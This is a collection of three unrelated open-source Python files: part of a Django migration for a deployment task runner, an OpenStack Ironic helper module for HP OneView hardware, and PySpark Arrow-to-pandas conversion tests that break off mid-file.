u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_production': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.server': {
'Meta': {'unique_together': "(('environment', 'name'),)", 'object_name': 'Server'},
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'servers'", 'to': u"orm['core.Environment']"}),
'host': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'servers'", 'symmetrical': 'False', 'to': u"orm['core.ServerRole']"}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.serverrole': {
'Meta': {'object_name': 'ServerRole'},
'department': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'serverroles'", 'to': u"orm['core.Department']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
u'task.execution': {
'Meta': {'object_name': 'Execution'},
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['core.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['task.Task']"}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'time_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'time_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['account.CustomUser']"})
},
u'task.executioncommand': {
'Meta': {'object_name': 'ExecutionCommand'},
'command': ('django.db.models.fields.TextField', [], {}),
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'commands'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.ServerRole']", 'symmetrical': 'False'})
},
u'task.executioncommandserver': {
'Meta': {'object_name': 'ExecutionCommandServer'},
'execution_command': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'servers'", 'to': u"orm['task.ExecutionCommand']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'output': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'return_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Server']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'time_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'task.executionlivelog': {
'Meta': {'object_name': 'ExecutionLiveLog'},
'data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'live_logs'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'task.executionparameter': {
'Meta': {'object_name': 'ExecutionParameter'},
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parameters'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'task.task': {
'Meta': {'unique_together': "(('application', 'name'),)", 'object_name': 'Task'},
'application': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tasks'", 'to': u"orm['core.Application']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'task.taskcommand': {
'Meta': {'object_name': 'TaskCommand'},
'command': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'commands'", 'symmetrical': 'False', 'to': u"orm['core.ServerRole']"}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'commands'", 'to': u"orm['task.Task']"})
},
u'task.taskparameter': {
'Meta': {'object_name': 'TaskParameter'},
'default_value': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parameters'", 'to': u"orm['task.Task']"})
}
}
complete_apps = ['task']
|
|
#
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.drivers import utils
LOG = logging.getLogger(__name__)
client = importutils.try_import('oneview_client.client')
oneview_states = importutils.try_import('oneview_client.states')
oneview_exceptions = importutils.try_import('oneview_client.exceptions')
opts = [
cfg.StrOpt('manager_url',
help=_('URL where OneView is available')),
cfg.StrOpt('username',
help=_('OneView username to be used')),
cfg.StrOpt('password',
secret=True,
help=_('OneView password to be used')),
cfg.BoolOpt('allow_insecure_connections',
default=False,
help=_('Option to allow insecure connection with OneView')),
cfg.StrOpt('tls_cacert_file',
default=None,
help=_('Path to CA certificate')),
cfg.IntOpt('max_polling_attempts',
default=12,
help=_('Max connection retries to check changes on OneView')),
]
CONF = cfg.CONF
CONF.register_opts(opts, group='oneview')
REQUIRED_ON_DRIVER_INFO = {
'server_hardware_uri': _("Server Hardware URI. Required in driver_info."),
}
REQUIRED_ON_PROPERTIES = {
'server_hardware_type_uri': _(
"Server Hardware Type URI. Required in properties/capabilities."
),
}
# TODO(gabriel-bezerra): Move 'server_profile_template_uri' to
# REQUIRED_ON_PROPERTIES after Mitaka. See methods get_oneview_info,
# verify_node_info from this file; and test_verify_node_info_missing_spt
# and test_deprecated_spt_in_driver_info* from test_common tests.
OPTIONAL_ON_PROPERTIES = {
'enclosure_group_uri': _(
"Enclosure Group URI. Optional in properties/capabilities."),
'server_profile_template_uri': _(
"Server Profile Template URI to clone from. "
"Deprecated in driver_info. "
"Required in properties/capabilities."),
}
COMMON_PROPERTIES = {}
COMMON_PROPERTIES.update(REQUIRED_ON_DRIVER_INFO)
COMMON_PROPERTIES.update(REQUIRED_ON_PROPERTIES)
COMMON_PROPERTIES.update(OPTIONAL_ON_PROPERTIES)
def get_oneview_client():
"""Generates an instance of the OneView client.
Generates an instance of the OneView client using the imported
oneview_client library.
:returns: an instance of the OneView client
"""
oneview_client = client.Client(
manager_url=CONF.oneview.manager_url,
username=CONF.oneview.username,
password=CONF.oneview.password,
allow_insecure_connections=CONF.oneview.allow_insecure_connections,
tls_cacert_file=CONF.oneview.tls_cacert_file,
max_polling_attempts=CONF.oneview.max_polling_attempts
)
return oneview_client
def verify_node_info(node):
"""Verifies if fields and namespaces of a node are valid.
Verifies if the 'driver_info' field and the 'properties/capabilities'
namespace exist and are not empty.
:param: node: node object to be verified
:raises: InvalidParameterValue if required node capabilities and/or
driver_info are malformed or missing
:raises: MissingParameterValue if required node capabilities and/or
driver_info are missing
"""
capabilities_dict = utils.capabilities_to_dict(
node.properties.get('capabilities', '')
)
driver_info = node.driver_info
_verify_node_info('properties/capabilities', capabilities_dict,
REQUIRED_ON_PROPERTIES)
# TODO(gabriel-bezerra): Remove this after Mitaka
try:
_verify_node_info('properties/capabilities', capabilities_dict,
['server_profile_template_uri'])
except exception.MissingParameterValue:
try:
_verify_node_info('driver_info', driver_info,
['server_profile_template_uri'])
LOG.warning(
_LW("Using 'server_profile_template_uri' in driver_info is "
"now deprecated and will be ignored in future releases. "
"Node %s should have it in its properties/capabilities "
"instead."),
node.uuid
)
except exception.MissingParameterValue:
raise exception.MissingParameterValue(
_("Missing 'server_profile_template_uri' parameter value in "
"properties/capabilities")
)
# end
_verify_node_info('driver_info', driver_info,
REQUIRED_ON_DRIVER_INFO)
def get_oneview_info(node):
"""Gets OneView information from the node.
:param: node: node object to get information from
:returns: a dictionary containing:
:server_hardware_uri: the uri of the server hardware in OneView
:server_hardware_type_uri: the uri of the server hardware type in
OneView
:enclosure_group_uri: the uri of the enclosure group in OneView
:server_profile_template_uri: the uri of the server profile template in
OneView
:raises InvalidParameterValue if node capabilities are malformed
"""
capabilities_dict = utils.capabilities_to_dict(
node.properties.get('capabilities', '')
)
driver_info = node.driver_info
oneview_info = {
'server_hardware_uri':
driver_info.get('server_hardware_uri'),
'server_hardware_type_uri':
capabilities_dict.get('server_hardware_type_uri'),
'enclosure_group_uri':
capabilities_dict.get('enclosure_group_uri'),
'server_profile_template_uri':
capabilities_dict.get('server_profile_template_uri') or
driver_info.get('server_profile_template_uri'),
}
return oneview_info
def validate_oneview_resources_compatibility(task):
"""Validates if the node configuration is consistent with OneView.
This method calls python-oneviewclient functions to validate if the node
configuration is consistent with the OneView resources it represents,
including server_hardware_uri, server_hardware_type_uri,
server_profile_template_uri, enclosure_group_uri and node ports. Also
verifies if a Server Profile is applied to the Server Hardware the node
represents. If any validation fails, python-oneviewclient will raise
an appropriate OneViewException.
:param: task: a TaskManager instance containing the node to act on.
"""
node = task.node
node_ports = task.ports
try:
oneview_client = get_oneview_client()
oneview_info = get_oneview_info(node)
oneview_client.validate_node_server_hardware(
oneview_info, node.properties.get('memory_mb'),
node.properties.get('cpus')
)
oneview_client.validate_node_server_hardware_type(oneview_info)
oneview_client.check_server_profile_is_applied(oneview_info)
oneview_client.is_node_port_mac_compatible_with_server_profile(
oneview_info, node_ports
)
oneview_client.validate_node_enclosure_group(oneview_info)
oneview_client.validate_node_server_profile_template(oneview_info)
except oneview_exceptions.OneViewException as oneview_exc:
msg = (_("Error validating node resources with OneView: %s")
% oneview_exc)
LOG.error(msg)
raise exception.OneViewError(error=msg)
def translate_oneview_power_state(power_state):
"""Translates OneView's power states strings to Ironic's format.
:param: power_state: power state string to be translated
:returns: the power state translated
"""
power_states_map = {
oneview_states.ONEVIEW_POWER_ON: states.POWER_ON,
oneview_states.ONEVIEW_POWERING_OFF: states.POWER_ON,
oneview_states.ONEVIEW_POWER_OFF: states.POWER_OFF,
oneview_states.ONEVIEW_POWERING_ON: states.POWER_OFF,
oneview_states.ONEVIEW_RESETTING: states.REBOOT
}
return power_states_map.get(power_state, states.ERROR)
def _verify_node_info(node_namespace, node_info_dict, info_required):
"""Verify if info_required is present in node_namespace of the node info.
"""
missing_keys = set(info_required) - set(node_info_dict)
if missing_keys:
raise exception.MissingParameterValue(
_("Missing the keys for the following OneView data in node's "
"%(namespace)s: %(missing_keys)s.") %
{'namespace': node_namespace,
'missing_keys': ', '.join(missing_keys)
}
)
# False and 0 can still be considered as valid values
missing_values_keys = [k for k in info_required
if node_info_dict[k] in ('', None)]
if missing_values_keys:
missing_keys = ["%s:%s" % (node_namespace, k)
for k in missing_values_keys]
raise exception.MissingParameterValue(
_("Missing parameter value for: '%s'") % "', '".join(missing_keys)
)
def node_has_server_profile(func):
"""Checks if the node's Server Hardware as a Server Profile associated.
"""
def inner(*args, **kwargs):
task = args[1]
oneview_info = get_oneview_info(task.node)
oneview_client = get_oneview_client()
try:
node_has_server_profile = (
oneview_client.get_server_profile_from_hardware(oneview_info)
)
except oneview_exceptions.OneViewException as oneview_exc:
LOG.error(
_LE("Failed to get server profile from OneView appliance for"
"node %(node)s. Error: %(message)s"),
{"node": task.node.uuid, "message": oneview_exc}
)
raise exception.OneViewError(error=oneview_exc)
if not node_has_server_profile:
raise exception.OperationNotPermitted(
_("A Server Profile is not associated with node %s.") %
task.node.uuid
)
return func(*args, **kwargs)
return inner
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import os
import threading
import time
import unittest
import warnings
from distutils.version import LooseVersion
from pyspark import SparkContext, SparkConf
from pyspark.sql import Row, SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import StructType, StringType, IntegerType, LongType, \
FloatType, DoubleType, DecimalType, DateType, TimestampType, BinaryType, StructField, ArrayType
from pyspark.testing.sqlutils import ReusedSQLTestCase, have_pandas, have_pyarrow, \
pandas_requirement_message, pyarrow_requirement_message
from pyspark.testing.utils import QuietTest
if have_pandas:
import pandas as pd
from pandas.util.testing import assert_frame_equal
if have_pyarrow:
import pyarrow as pa # noqa: F401
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
class ArrowTests(ReusedSQLTestCase):
@classmethod
def setUpClass(cls):
from datetime import date, datetime
from decimal import Decimal
super(ArrowTests, cls).setUpClass()
cls.warnings_lock = threading.Lock()
# Synchronize default timezone between Python and Java
cls.tz_prev = os.environ.get("TZ", None) # save current tz if set
tz = "America/Los_Angeles"
os.environ["TZ"] = tz
time.tzset()
cls.spark.conf.set("spark.sql.session.timeZone", tz)
# Test fallback
cls.spark.conf.set("spark.sql.execution.arrow.enabled", "false")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.enabled") == "false"
cls.spark.conf.set("spark.sql.execution.arrow.enabled", "true")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.enabled") == "true"
cls.spark.conf.set("spark.sql.execution.arrow.fallback.enabled", "true")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.fallback.enabled") == "true"
cls.spark.conf.set("spark.sql.execution.arrow.fallback.enabled", "false")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.fallback.enabled") == "false"
# Enable Arrow optimization in this tests.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.enabled", "true")
# Disable fallback by default to easily detect the failures.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.fallback.enabled", "false")
cls.schema = StructType([
StructField("1_str_t", StringType(), True),
StructField("2_int_t", IntegerType(), True),
StructField("3_long_t", LongType(), True),
StructField("4_float_t", FloatType(), True),
StructField("5_double_t", DoubleType(), True),
StructField("6_decimal_t", DecimalType(38, 18), True),
StructField("7_date_t", DateType(), True),
StructField("8_timestamp_t", TimestampType(), True),
StructField("9_binary_t", BinaryType(), True)])
cls.data = [(u"a", 1, 10, 0.2, 2.0, Decimal("2.0"),
date(1969, 1, 1), datetime(1969, 1, 1, 1, 1, 1), bytearray(b"a")),
(u"b", 2, 20, 0.4, 4.0, Decimal("4.0"),
date(2012, 2, 2), datetime(2012, 2, 2, 2, 2, 2), bytearray(b"bb")),
(u"c", 3, 30, 0.8, 6.0, Decimal("6.0"),
date(2100, 3, 3), datetime(2100, 3, 3, 3, 3, 3), bytearray(b"ccc")),
(u"d", 4, 40, 1.0, 8.0, Decimal("8.0"),
date(2262, 4, 12), datetime(2262, 3, 3, 3, 3, 3), bytearray(b"dddd"))]
@classmethod
def tearDownClass(cls):
del os.environ["TZ"]
if cls.tz_prev is not None:
os.environ["TZ"] = cls.tz_prev
time.tzset()
super(ArrowTests, cls).tearDownClass()
def create_pandas_data_frame(self):
import numpy as np
data_dict = {}
for j, name in enumerate(self.schema.names):
data_dict[name] = [self.data[i][j] for i in range(len(self.data))]
# need to convert these to numpy types first
data_dict["2_int_t"] = np.int32(data_dict["2_int_t"])
data_dict["4_float_t"] = np.float32(data_dict["4_float_t"])
return pd.DataFrame(data=data_dict)
def test_toPandas_fallback_enabled(self):
ts = datetime.datetime(2015, 11, 1, 0, 30)
with self.sql_conf({"spark.sql.execution.arrow.pyspark.fallback.enabled": True}):
schema = StructType([StructField("a", ArrayType(TimestampType()), True)])
df = self.spark.createDataFrame([([ts],)], schema=schema)
with QuietTest(self.sc):
with self.warnings_lock:
with warnings.catch_warnings(record=True) as warns:
# we want the warnings to appear even if this test is run from a subclass
warnings.simplefilter("always")
pdf = df.toPandas()
# Catch and check the last UserWarning.
user_warns = [
warn.message for warn in warns if isinstance(warn.message, UserWarning)]
self.assertTrue(len(user_warns) > 0)
self.assertTrue(
"Attempting non-optimization" in str(user_warns[-1]))
assert_frame_equal(pdf, pd.DataFrame({"a": [[ts]]}))
def test_toPandas_fallback_disabled(self):
schema = StructType([StructField("a", ArrayType(TimestampType()), True)])
df = self.spark.createDataFrame([(None,)], schema=schema)
with QuietTest(self.sc):
with self.warnings_lock:
with self.assertRaisesRegexp(Exception, 'Unsupported type'):
df.toPandas()
def test_null_conversion(self):
df_null = self.spark.createDataFrame([tuple([None for _ in range(len(self.data[0]))])] +
self.data)
pdf = df_null.toPandas()
null_counts = pdf.isnull().sum().tolist()
self.assertTrue(all([c == 1 for c in null_counts]))
def _toPandas_arrow_toggle(self, df):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
pdf = df.toPandas()
pdf_arrow = df.toPandas()
return pdf, pdf_arrow
def test_toPandas_arrow_toggle(self):
df = self.spark.createDataFrame(self.data, schema=self.schema)
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
expected = self.create_pandas_data_frame()
assert_frame_equal(expected, pdf)
assert_frame_equal(expected, pdf_arrow)
def test_toPandas_respect_session_timezone(self):
df = self.spark.createDataFrame(self.data, schema=self.schema)
timezone = "America/Los_Angeles"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
pdf_la, pdf_arrow_la = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow_la, pdf_la)
timezone = "America/New_York"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
pdf_ny, pdf_arrow_ny = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow_ny, pdf_ny)
self.assertFalse(pdf_ny.equals(pdf_la))
from pyspark.sql.pandas.types import _check_series_convert_timestamps_local_tz
pdf_la_corrected = pdf_la.copy()
for field in self.schema:
if isinstance(field.dataType, TimestampType):
pdf_la_corrected[field.name] = _check_series_convert_timestamps_local_tz(
pdf_la_corrected[field.name], timezone)
assert_frame_equal(pdf_ny, pdf_la_corrected)
def test_pandas_round_trip(self):
pdf = self.create_pandas_data_frame()
df = self.spark.createDataFrame(self.data, schema=self.schema)
pdf_arrow = df.toPandas()
assert_frame_equal(pdf_arrow, pdf)
def test_filtered_frame(self):
df = self.spark.range(3).toDF("i")
pdf = df.filter("i < 0").toPandas()
self.assertEqual(len(pdf.columns), 1)
self.assertEqual(pdf.columns[0], "i")
self.assertTrue(pdf.empty)
def test_no_partition_frame(self):
schema = StructType([StructField("field1", StringType(), True)])
df = self.spark.createDataFrame(self.sc.emptyRDD(), schema)
pdf = df.toPandas()
self.assertEqual(len(pdf.columns), 1)
self.assertEqual(pdf.columns[0], "field1")
self.assertTrue(pdf.empty)
def test_propagates_spark_exception(self):
df = self.spark.range(3).toDF("i")
def raise_exception():
raise Exception("My error")
exception_udf = udf(raise_exception, IntegerType())
df = df.withColumn("error", exception_udf())
with QuietTest(self.sc):
with self.assertRaisesRegexp(Exception, 'My error'):
df.toPandas()
def _createDataFrame_toggle(self, pdf, schema=None):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df_no_arrow = self.spark.createDataFrame(pdf, schema=schema)
df_arrow = self.spark.createDataFrame(pdf, schema=schema)
return df_no_arrow, df_arrow
def test_createDataFrame_toggle(self):
pdf = self.create_pandas_data_frame()
df_no_arrow, df_arrow = self._createDataFrame_toggle(pdf, schema=self.schema)
self.assertEquals(df_no_arrow.collect(), df_arrow.collect())
def test_createDataFrame_respect_session_timezone(self):
from datetime import timedelta
pdf = self.create_pandas_data_frame()
timezone = "America/Los_Angeles"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
df_no_arrow_la, df_arrow_la = self._createDataFrame_toggle(pdf, schema=self.schema)
result_la = df_no_arrow_la.collect()
result_arrow_la = df_arrow_la.collect()
self.assertEqual(result_la, result_arrow_la)
timezone = "America/New_York"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
df_no_arrow_ny, df_arrow_ny = self._createDataFrame_toggle(pdf, schema=self.schema)
result_ny = df_no_arrow_ny.collect()
result_arrow_ny = df_arrow_ny.collect()
self.assertEqual(result_ny, result_arrow_ny)
self.assertNotEqual(result_ny, result_la)
# Correct result_la by adjusting 3 hours difference between Los Angeles and New York
result_la_corrected = [Row(**{k: v - timedelta(hours=3) if k == '8_timestamp_t' else v
for k, v in row.asDict().items()})
for row in result_la]
self.assertEqual(result_ny, result_la_corrected)
def test_createDataFrame_with_schema(self):
pdf = self.create_pandas_data_frame()
df = self.spark.createDataFrame(pdf, schema=self.schema)
self.assertEquals(self.schema, df.schema)
pdf_arrow = df.toPandas()
assert_frame_equal(pdf_arrow, pdf)
def test_createDataFrame_with_incorrect_schema(self):
pdf = self.create_pandas_data_frame()
fields = list(self.schema)
fields[5], fields[6] = fields[6], fields[5] # swap decimal with date
wrong_schema = StructType(fields)
with self.sql_conf({"spark.sql.execution.pandas.convertToArrowArraySafely": False}):
with QuietTest(self.sc):
with self.assertRaisesRegexp(Exception, "[D|d]ecimal.*got.*date"):
self.spark.createDataFrame(pdf, schema=wrong_schema)
def test_createDataFrame_with_names(self):
pdf = self.create_pandas_data_frame()
new_names = list(map(str, range(len(self.schema.fieldNames()))))
# Test that schema as a list of column names gets applied
df = self.spark.createDataFrame(pdf, schema=list(new_names))
self.assertEquals(df.schema.fieldNames(), new_names)
# Test that schema as tuple of column names gets applied
df = self.spark.createDataFrame(pdf, schema=tuple(new_names))
self.assertEquals(df.schema.fieldNames(), new_names)
def test_createDataFrame_column_name_encoding(self):
pdf = pd.DataFrame({u'a': [1]})
columns = self.spark.createDataFrame(pdf).columns
self.assertTrue(isinstance(columns[0], str))
self.assertEquals(columns[0], 'a')
columns = self.spark.createDataFrame(pdf, [u'b']).columns
self.assertTrue(isinstance(columns[0], str))
self.assertEquals(columns[0], 'b')
def test_createDataFrame_with_single_data_type(self):
with QuietTest(self.sc):
with self.assertRaisesRegexp(ValueError, ".*IntegerType.*not supported.*"):
self.spark.createDataFrame(pd.DataFrame({"a": [1]}), schema="int")
def test_createDataFrame_does_not_modify_input(self):
# Some series get converted for Spark to consume, this makes sure input is unchanged
pdf = self.create_pandas_data_frame()
# Use a nanosecond value to make sure it is not truncated
pdf.iloc[0, 7] = pd.Timestamp(1)
# Integers with nulls will get NaNs filled with 0 and will be casted
pdf.iloc[1, 1] = None
pdf_copy = pdf.copy(deep=True)
self.spark.createDataFrame(pdf, schema=self.schema)
self.assertTrue(pdf.equals(pdf_copy))
def test_schema_conversion_roundtrip(self):
from pyspark.sql.pandas.types import from_arrow_schema, to_arrow_schema
arrow_schema = to_arrow_schema(self.schema)
schema_rt = from_arrow_schema(arrow_schema)
self.assertEquals(self.schema, schema_rt)
def test_createDataFrame_with_array_type(self):
pdf = pd.DataFrame({"a": [[1, 2], [3, 4]], "b": [[u"x", u"y"], [u"y", u"z"]]})
df, df_arrow = self._createDataFrame_toggle(pdf)
result = df.collect()
result_arrow = df_arrow.collect()
expected = [tuple(list(e) for e in rec) for rec in pdf.to_records(index=False)]
for r in range(len(expected)):
for e in range(len(expected[r])):
self.assertTrue(expected[r][e] == result_arrow[r][e] and
result[r][e] == result_arrow[r][e])
def test_toPandas_with_array_type(self):
expected = [([1, 2], [u"x", u"y"]), ([3, 4], [u"y", u"z"])]
array_schema = StructType([StructField("a", ArrayType(IntegerType())),
StructField("b", ArrayType(StringType()))])
df = self.spark.createDataFrame(expected, schema=array_schema)
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
result = [tuple(list(e) for e in rec) for rec in pdf.to_records(index=False)]
result_arrow = [tuple(list(e) for e in rec) for rec in pdf_arrow.to_records(index=False)]
for r in range(len(expected)):
for e in range(len(expected[r])):
self.assertTrue(expected[r][e] == result_arrow[r][e] and
result[r][e] == result_arrow[r][e])
def test_createDataFrame_with_map_type(self):
map_data = [{"a": 1}, {"b": 2, "c": 3}, {}, None, {"d": None}]
pdf = pd.DataFrame({"id": [0, 1, 2, 3, 4], "m": map_data})
schema = "id long, m map<string, long>"
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema=schema)
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
self.spark.createDataFrame(pdf, schema=schema)
else:
df_arrow = self.spark.createDataFrame(pdf, schema=schema)
result = df.collect()
result_arrow = df_arrow.collect()
self.assertEqual(len(result), len(result_arrow))
for row, row_arrow in zip(result, result_arrow):
i, m = row
_, m_arrow = row_arrow
self.assertEqual(m, map_data[i])
self.assertEqual(m_arrow, map_data[i])
def test_toPandas_with_map_type(self):
pdf = pd.DataFrame({"id": [0, 1, 2, 3],
"m": [{}, {"a": 1}, {"a": 1, "b": 2}, {"a": 1, "b": 2, "c": 3}]})
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema="id long, m map<string, long>")
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
df.toPandas()
else:
pdf_non, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow, pdf_non)
def test_toPandas_with_map_type_nulls(self):
pdf = pd.DataFrame({"id": [0, 1, 2, 3, 4],
"m": [{"a": 1}, {"b": 2, "c": 3}, {}, None, {"d": None}]})
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema="id long, m map<string, long>")
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
df.toPandas()
else:
pdf_non, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow, pdf_non)
def test_createDataFrame_with_int_col_names(self):
import numpy as np
pdf = pd.DataFrame(np.random.rand(4, 2))
df, df_arrow = self._createDataFrame_toggle(pdf)
pdf_col_names = [str(c) for c in pdf.columns]
self.assertEqual(pdf_col_names, df.columns)
self.assertEqual(pdf_col_names, df_arrow.columns)
def test_createDataFrame_fallback_enabled(self):
ts = datetime.datetime(2015, 11, 1, 0, 30)
with QuietTest(self.sc):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.fallback.enabled": True}):
with warnings.catch_warnings(record=True) as warns:
# we want the warnings to appear even if this test is run from a subclass
warnings.simplefilter("always")
df = self.spark.createDataFrame(
pd.DataFrame({"a": [[ts]]}), "a: array<timestamp>")
# Catch and check the last UserWarning.
user_warns = [
warn.message for warn in warns if isinstance(warn.message, UserWarning)]
self.assertTrue(len(user_warns) > 0)
self.assertTrue(
"Attempting non-optimization" in str(user_warns[-1]))
self.assertEqual(df.collect(), [Row(a=[ts])])
def test_createDataFrame_fallback_disabled(self):
with QuietTest(self.sc):
with self.assertRaisesRegexp(TypeError, 'Unsupported type'):
self.spark.createDataFrame(
pd.DataFrame({"a": [[datetime.datetime(2015, 11, 1, 0, 30)]]}),
"a: array<timestamp>")
# Regression test for SPARK-23314
def test_timestamp_dst(self):
# Daylight saving time for Los Angeles for 2015 is Sun, Nov 1 at 2:00 am
dt = [datetime.datetime(2015, 11, 1, 0, 30),
datetime.datetime(2015, 11, 1, 1, 30),
datetime.datetime(2015, 11, 1, 2, 30)]
pdf = pd.DataFrame({'time': dt})
df_from_python = self.spark.createDataFrame(dt, 'timestamp').toDF('time')
df_from_pandas = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df_from_python.toPandas())
assert_frame_equal(pdf, df_from_pandas.toPandas())
# Regression test for SPARK-28003
def test_timestamp_nat(self):
dt = [pd.NaT, pd.Timestamp('2019-06-11'), None] * 100
pdf = pd.DataFrame({'time': dt})
df_no_arrow, df_arrow = self._createDataFrame_toggle(pdf)
assert_frame_equal(pdf, df_no_arrow.toPandas())
assert_frame_equal(pdf, df_arrow.toPandas())
def test_toPandas_batch_order(self):
